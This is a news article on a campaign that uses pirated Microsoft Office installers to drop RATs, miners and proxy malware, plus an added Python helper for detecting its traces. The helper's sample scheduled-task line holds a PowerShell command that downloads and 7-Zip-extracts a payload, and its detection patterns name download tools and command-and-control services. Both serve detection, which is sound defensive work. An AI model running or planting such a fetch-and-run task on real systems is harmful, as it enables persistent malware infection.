Security experts are raising alarm after reports that pirated versions of Microsoft Office are being used to distribute a cocktail of malware.
These cracked versions of Office are usually found on popular torrent websites, where malware is commonly distributed to users. The threat actors' goal appears to be delivering remote access trojans (RATs), cryptocurrency miners, malware downloaders, and proxy tools.
AhnLab's Security Intelligence Center (ASEC) identified the ongoing campaign and warned about the risks of installing pirated software.
The findings were first reported by researchers based in Korea, who described how the attackers used lures including Microsoft Office, Hangul Word Processor, and even Windows itself, all of which are popular in Korea.
The cracked Microsoft Office installers present a polished interface that lets users choose the edition they want to download, the language, and the install size variant.
In the background, the installer launches malware that contacts Telegram or Mastodon to obtain valid download URLs for additional components.
Those URLs point to legitimate hosting services such as Google Drive, so the downloads do not trigger antivirus warnings.
The payloads hosted there contain PowerShell commands that introduce further malware strains into the system and unpack them with 7-Zip. The malware's Updater component then registers new tasks in the Windows Task Scheduler so that it is relaunched whenever the system reboots.
According to ASEC's report, several kinds of malware are downloaded onto compromised systems. They include Orcus RAT, which provides remote control and allows access to webcams, screenshots, and manipulation of the system to harvest data.
XMRig mines cryptocurrency and employs techniques to avoid detection while doing so. The report also identified 3Proxy, which turns compromised systems into proxy servers by opening port 3306 and injecting itself into legitimate processes; attackers can then intercept traffic and infect incoming connections.
PureCrypter loads malicious payloads from external sources, ensuring the system remains infected even as new payloads are introduced. Lastly, the report discusses a component that disables security programs by altering their configuration so that the software no longer functions correctly, leaving the system exposed to the other components.
Even if users find and remove the malware listed above, the Updater module can reintroduce it.
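As an added example (not ASEC's or the article's code, and with every sample line constructed), the Python triage helpers below check for the two host-side traces the article describes: the Updater's scheduled task that runs PowerShell to download and 7-Zip-extract payloads, and 3Proxy's listener on port 3306 inside a legitimate process. The `schtasks /query /fo CSV /v` and `netstat -ano` layouts are real; the PID-to-image map is assumed to come from `tasklist`.

```python
import csv
import io
import re

# Constructed sample in the shape of `schtasks /query /fo CSV /v` output (subset of
# the real columns). The second task mimics the Updater persistence in the article.
SAMPLE_TASK_CSV = r'''"TaskName","Author","Task To Run","Run As User"
"\Microsoft\Windows\WindowsUpdate\Scheduled Start","Microsoft Corporation","%systemroot%\system32\usoclient.exe StartScan","SYSTEM"
"\OfficeUpdater","DESKTOP-1\alice","powershell.exe -c ""iwr https://drive.google.com/uc?id=PLACEHOLDER -OutFile $env:TEMP\pkg.7z; & 7z.exe x $env:TEMP\pkg.7z""","alice"
"\Backup","DESKTOP-1\alice","C:\Tools\backup.exe --nightly","alice"
'''
# Constructed `netstat -ano` lines and a PID-to-image map (as from tasklist).
SAMPLE_NETSTAT = [
    "  TCP    0.0.0.0:3306           0.0.0.0:0              LISTENING       4120",
    "  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4",
]
SAMPLE_PROCS = {4120: "svchost.exe", 4: "System"}

# Indicators taken from the article: PowerShell run by a task, web downloads,
# 7-Zip extraction, and the services used to obtain payload URLs/files.
INDICATORS = {
    "powershell_action": re.compile(r"\b(powershell(\.exe)?|pwsh)\b", re.I),
    "web_download": re.compile(r"\b(iwr|invoke-webrequest|curl|wget|downloadstring|downloadfile)\b", re.I),
    "7zip_extract": re.compile(r"\b7za?(\.exe)?\s+[xe]\b", re.I),
    "hosting_or_c2": re.compile(r"drive\.google\.com|api\.telegram\.org|t\.me/|mastodon", re.I),
}

def triage_tasks(schtasks_csv: str) -> list[dict]:
    """Flag scheduled tasks whose action matches two or more indicators
    (a task that merely runs PowerShell is too common to flag on its own)."""
    findings = []
    for row in csv.DictReader(io.StringIO(schtasks_csv)):
        action = row.get("Task To Run", "")
        hits = [name for name, rx in INDICATORS.items() if rx.search(action)]
        if len(hits) >= 2:
            findings.append({"task": row["TaskName"], "user": row.get("Run As User", ""), "hits": hits})
    return findings

def suspicious_3306_listeners(netstat_lines: list[str], proc_names: dict[int, str]) -> list[int]:
    """Return PIDs listening on TCP 3306 (the port the report says 3Proxy opens)
    whose image is not a MySQL/MariaDB server."""
    pids = []
    for line in netstat_lines:
        parts = line.split()
        if len(parts) == 5 and parts[0] == "TCP" and parts[1].endswith(":3306") and parts[3] == "LISTENING":
            pid = int(parts[4])
            if not re.fullmatch(r"(mysqld|mariadbd)(\.exe)?", proc_names.get(pid, ""), re.I):
                pids.append(pid)
    return pids
```

On a live host, feed the functions the actual output of `schtasks /query /fo CSV /v`, `netstat -ano`, and `tasklist`; a flagged task or an unexplained listener on 3306 warrants a closer look at the task's action and the owning process.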
Users should therefore be cautious when downloading files from unofficial sources and, as a general precaution, avoid pirated software.
Many campaigns of this type have surfaced, and they are said to bundle STOP ransomware, the most active of the lot in targeting clients.
Remember that these files are not digitally signed, so users should never ignore antivirus warnings when running them. Such files are frequently used to infect systems with this malware, and in the end the whole system is compromised.
As the old saying goes, it is better to be safe than sorry: stay informed and protected at all times.
Image: DIW-Aigen